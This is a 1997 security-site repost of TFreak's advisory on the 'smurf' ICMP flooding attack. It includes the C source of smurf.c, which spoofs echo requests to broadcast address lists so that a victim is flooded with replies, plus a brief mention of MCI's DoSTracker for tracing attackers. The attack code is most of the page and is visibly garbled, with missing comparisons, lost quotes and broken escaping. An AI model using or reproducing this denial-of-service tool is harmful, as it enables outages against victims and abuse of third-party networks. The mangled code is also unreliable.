TCP/IP Flooding with Smurf


Reported October 13, 1997 by TFreak

Systems Affected

Any system employing TCP/IP

The Problem

The smurf attack is quite simple.  It has a list of broadcast addresses which it stores into an array, and sends a spoofed ICMP echo request to each of those addresses in series and starts again. The result is a devistating attack upon the spoofed IP. Depending on the amount of broadcast addresses used, many, many computers may respond to the echo request.

This attack can EASILY saturate a T1 circuit, rendering it completely useless.


*  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $*
*  spoofs icmp packets from a host to various broadcast addresses resulting
*  in multiple replies to that host from a single packet.

*  disclaimer:
*     I cannot and will not be held responsible nor legally bound for the
*     malicious activities of individuals who come into possession of this
*     program and I refuse to provide help or support of any kind and do NOT
*     condone use of this program to deny service to anyone or any machine.
*     This is for educational use only. Please Don"t abuse this.
* TFreak


void banner(void);
void usage(char *);
void smurf(int, struct sockaddr_in, u_long, int);
void ctrlc(int);
unsigned short in_chksum(u_short *, int);

/* stamp */
char id\[\] = $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $;

int main (int argc, char *argv\[\])
   struct sockaddr_in sin;
   struct hostent *he;
   FILE   *bcastfile;
   int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;
   char   buf\[32\], **bcastaddr = malloc(8192);

   signal(SIGINT, ctrlc);

   if (argc h_addr, he->h_length);
   sin.sin_family = AF_INET;
   sin.sin_port = htons(0);

   num = atoi(argv\[3\]);
   delay = atoi(argv\[4\]);
   pktsize = atoi(argv\[5\]);

   if ((bcastfile = fopen(argv\[2\], r)) 

NULL) \{       perror(opening bcast file);       exit(-1);    \}    x = 0;    while (!feof(bcastfile)) \{       fgets(buf, 32, bcastfile);       if (buf\[0\]

"#" || buf\[0\]

"\n" || ! isdigit(buf\[0\])) continue;       for (i = 0; i 1024) \{       fprintf(stderr, ERROR: packet size must be                    \n\n                    target        = address to hit\n                    bcast file    = file to read broadcast addresses from\n                    num packets   = number of packets to send (0 = flood)\n                    packet delay  = wait between each packet (in ms)\n                    packet size   = size of packet (tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);    ip->ihl = 5;    ip->version = 4;    ip->ttl = 255;    ip->tos = 0;    ip->frag_off = 0;    ip->protocol = IPPROTO_ICMP;    ip->saddr = sin.sin_addr.s_addr;    ip->daddr = dest;    ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));    icmp->type = 8;    icmp->code = 0;    icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);    sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,           0, (struct sockaddr *)&sin, sizeof(struct sockaddr));    free(packet);           /* free willy! */ \} void ctrlc (int ignored) \{    puts(\nDone!\n);    exit(1); \} unsigned short in_chksum (u_short *addr, int len) \{    register int nleft = len;    register int sum = 0;    u_short answer = 0;    while (nleft > 1) \{       sum += *addr++;       nleft -= 2;    \}    if (nleft

1) \{       *(u_char *)(&answer) = *(u_char *)addr;       sum += answer;    \}    sum = (sum >> 16) + (sum + 0xffff);    sum += (sum >> 16);    answer = ~sum;    return(answer); \}

Stopping the Problem:

MCI has a tool called DoSTracker that may help you track down Smurf users.

To learn more about new NT security concerns, subscribe to NTSD.

Reported by TFreak
Posted here at NTSecurity.Net October 12, 1997

Hide comments


  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.